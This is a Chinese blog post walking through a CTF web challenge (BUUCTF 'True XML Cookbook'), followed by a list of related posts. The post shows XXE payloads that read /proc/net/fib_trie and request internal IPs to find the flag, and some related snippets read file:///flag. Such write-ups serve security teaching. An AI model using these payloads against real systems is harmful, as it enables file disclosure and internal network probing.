BUUCTF WEB TRUE XML COOKBOOK

最新推荐文章于 2024-01-02 19:03:19 发布
最新推荐文章于 2024-01-02 19:03:19 发布
阅读量561 收藏 1
点赞数
分类专栏: BUUCTF 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41696858/article/details/124666581
版权

由于某种神秘的不可抗力,很久没更新了,emmmm。以后还是勤快一点吧
言归正转,这题都已经把提示给到脸上了,xml,这不试试xml注入?
经典登录界面,抓包就可以发现数据事宜xml形式的传往后台的
X-Requested-With: XMLHttpRequest
依旧推荐https://xz.aliyun.com/t/6887#toc-5
构造倒是没有多难,但这题最大的坑点在于flag不是在本地的,所以他是一个内网题。。。。
一个小经验:由于BUUCTF转用了K8S管理,他的靶机容器是随机在80,81两个网段里的
具体情况看/proc/net/fib_trie
读取到本题靶机被动态生成在了10.244.81网段,每次生成ip都是随机的
那么抓包用burpsuite爆破就好了
给出payload:
读取网段

<?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE a [

 <!ENTITY admin SYSTEM "file:///proc/net/fib_trie">

 ]>

<user><username>&admin;</username><password>admin</password></user>

搜索flag:

<?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE a [

 <!ENTITY admin SYSTEM "http://10.244.81.166">

 ]>

<user><username>&admin;</username><password>admin</password></user>

参考视频链接:https://www.bilibili.com/video/BV1Y5411d7nb?spm_id_from=333.999.0.0

显哥无敌
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Python Web Penetration Testing Cookbook mobi
01-12
Python Web Penetration Testing Cookbook 英文mobi 本资源转载自网络,如有侵权,请联系上传者或csdn删除 查看此书详细信息请在美国亚马逊官网搜索此书
Python Web Scraping Cookbook epub
04-09
Python Web Scraping Cookbook 英文epub 本资源转载自网络,如有侵权,请联系上传者或csdn删除 查看此书详细信息请在美国亚马逊官网搜索此书
CTF中Web各种题目的解题姿势
05-25
Web题型是CTF中常考题型之一,它将实际渗透过程中的技术技巧转化为CTF赛题,主要考察选手在Web渗透技术方面的能力,由于Web渗透涉及的知识点较多,知识面比较广泛,因此系统的总结和练习Web类题,是快速掌握出题人思路的一种有效的方法。
buuctf 刷题 6(WEB-INF/web.xml&&&&Smarty模板注入&&py脚本编写)
weixin_63231007的博客
05-25 718
[RoarCTF 2019]Easy Java 进去页面,得到一个登录框。因为题目是java,应该不是sql注入, 点开help,看见: filename参数可控 。没做过相应的java安全题目。看其他师傅题解可知,可能存在文件下载漏洞 url 栏里get传入WEB-INF/web.xml。无果,post传入意外发现可以下载文件。 下载存有web信息的XML文件:WEB-INF/web.xml 查看文件内容,文件里内容有: <servlet> &l
BUUCTF Web [NCTF2019]Fake XML cookbook1 & [安洵杯 2019]easy_web1
网安小趴菜
09-25 608
BUUCTF Web [NCTF2019]Fake XML cookbook1 & [安洵杯 2019]easy_web1
WEB漏洞-XXE&XML之利用检测绕过
Rnan_prince的博客
07-28 1358
什么是XML?参考文档 XML被设计为传输和存储数据,XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素,其焦点是数据的内容,其把数据从HTML分离,是独立于软件和硬件的信息传输工具。 XML与HTML对比 XML被设计为传输和存储数据,其焦点是数据的内容。 HTML被设计为显示数据,其焦点是数据的外观。 XML旨在传输信息,HTML旨在传输信息。 Xml典型代码: <!--XML声明--> <?xml version="1.0"?> <!-..
BUUCTF-easy java WEB-INF/web.xml泄露漏洞及其利用
最新发布
zy1276046082的博客
01-02 540
WEB-INF/web.xml泄露漏洞及其利用 BUUCTF-easy java
Python Web Scraping Cookbook mobi
04-09
Python Web Scraping Cookbook 英文mobi 本资源转载自网络,如有侵权,请联系上传者或csdn删除 查看此书详细信息请在美国亚马逊官网搜索此书
The Web Game Developers Cookbook epub
10-06
The Web Game Developers Cookbook 英文epub 本资源转载自网络,如有侵权,请联系上传者或csdn删除 本资源转载自网络,如有侵权,请联系上传者或csdn删除
Python Web Penetration Testing Cookbook epub
01-12
Python Web Penetration Testing Cookbook 英文epub 本资源转载自网络,如有侵权,请联系上传者或csdn删除 查看此书详细信息请在美国亚马逊官网搜索此书
BUUCTF-WEB-INF/web.xml泄露-SSTI注入
m0_64180167的博客
04-17 702
其实和sql注入一样 sql注入是通过构造字符串 让我们要比对的字符串变为执行的命令ssti也是一样的 只不过 ssti是在框架中执行 语言框架对html的渲染 因为对字符串不够严格 就容易变为命令执行是用户和页面交互的函数 页面可以通过用户的操作来展示页面。
BUUCTF Fake XML cookbook
wwwwyyyrre的博客
04-08 218
打开题目发现有账号密码登录 先尝试万能密码 但是发现不行 回到题目有xml 去搜索一下发现xml有注入漏洞XXE:XML External Entity 即外部实体,从安全角度理解成XML External Entity attack 外部实体注入攻击。由于程序在解析输入的XML数据时,解析了攻击者伪造的外部实体而产生的。例如PHP中的simplexml_load 默认情况下会解析外部实体,有XXE漏洞的标志性函数为simplexml_load_string()。XXE原理。
buuctf-[NCTF2019]Fake XML cookbook(小宇特详解)
小宇的web博客
02-18 4267
buuctf-[NCTF2019]Fake XML cookbook(小宇特详解) 这里先看题 乍一看像是sql注入,但是题目提示了是xml,这里就不考虑sql注入了。 先抓包看一下 这里的X-Requested-With提示了XML 然后发送到了doLogin.php 这里先讲一下XML的相关知识 XXE的危害和SSRF的有点像 XXE=>XML外部实体注入(被各种后端脚本调用) XML=>像html,html的目的是显示数据,但是xml的目的是传输数据,他没有预定义,他是纯文本,他是不会
xxe学习之hetianlab-simplexxe及buuctf-fake xml cookbook
m0_62008601的博客
04-22 329
目录 定义 xml的基本格式和语法 合天网安实验室-simplexxe buuctf-fake cookbook 首先,我们先来初步了解一下什么是xxe 1、定义 XXE(XMLExternalEntityInjection)全称为XML外部实体注入,由于程序在解析输入的XML数据时,解析了攻击者伪造的外部实体而产生的。例如PHP中的simplexml_load默认情况下会解析外部实体,有XXE漏洞的标志性函数为simplexml_load_string()。而学习XXE要从认识XM...
一天一道ctf 第22天(web.xml
scrawman的博客
04-11 367
[RoarCTF 2019]Easy Java 查看源码发现有一个help.dox文件,但是读不了 看了一下网上的wp这道题知识点还是挺多的 首先bp抓包把GET请求改成POST请求就能查看文件了(还是要积累经验),只要改’GET’就行了,别的都不用动 但help.docx里没有有用的信息,那你给我提示这个文件干嘛??? 但是我们知道了可以用这种方式请求文件 用http://7f1b9882-442b-4f1f-8b09-c842d6f13b50.node3.buuoj.cn/Download?file
看雪CTF web(SSRF+XML+JAR协议)
a3320315的博客
12-01 1548
题外 很久没写文章了,这儿再水一篇 正文 首先打开题目 直接有个提示,给了两个链接 根据测试第一个链接/getimage?url=https://bbs.pediy.com是远程加载图片的,而且对于url有一定的格式要求 那么我们怎么绕过这个正则呢? 这儿就需要用到一个技巧了,这儿是java环境, httpclient3和httpclient4这两个库都有容错机制,即假如端口后面存在其他字符会自动舍弃掉(/作为分隔符) 而且都会对host进行url二次解码,所以我们最终的payload为: http:/
BUUCTF:[NCTF2019]Fake XML cookbook
qq_46230755的博客
12-18 506
说在前面 这题的考点是XXE攻击 https://xz.aliyun.com/t/6887 这里很详细讲了什么是XXE 打开来后的页面是这样的,我们试着用admin和123456进行输入,然后抓个包 里面存在一个XML实体,我们可以构造恶意实体,读取flag <!DOCTYPE ANY [ <!ENTITY test SYSTEM "file:///flag"> ]> <user><username>&test;</username.
BUUCTF [NCTF2019] Fake XML cookbook
Senimo
01-03 793
[NCTF2019]Fake XML cookbook 考点: 启动环境: 由题目提示,猜测为XXE漏洞。 首先尝试登陆: 使用BurpSuite抓取数据包: 看到了其中的XML代码: <user><username>admin</username><password>admin</password></user> 查看网页源码: <script type='text/javascript'> function d
buuctf-Fake XML cookbook
m0_62094846的博客
04-06 321
抓包后看它的传参格式有点像xss,但是尝试过没有回显,看别人的wp,是xxe,也是和html有关 直接粘贴别人的payload,然后分析学习下 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE note [ <!ENTITY c SYSTEM "file:///flag"> ]> <user><username>&c;</username><passwor...
Python Cookbook英文原版:解析XML与SAX
"Python Cookbook英文原版,基础教程,包含如何解析XML及SAX解析方法" Python Cookbook是由David Beazley和Brian K. Jones编写的,是Python编程领域的一本经典参考书籍,尤其对于想要深入理解和优化Python代码的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值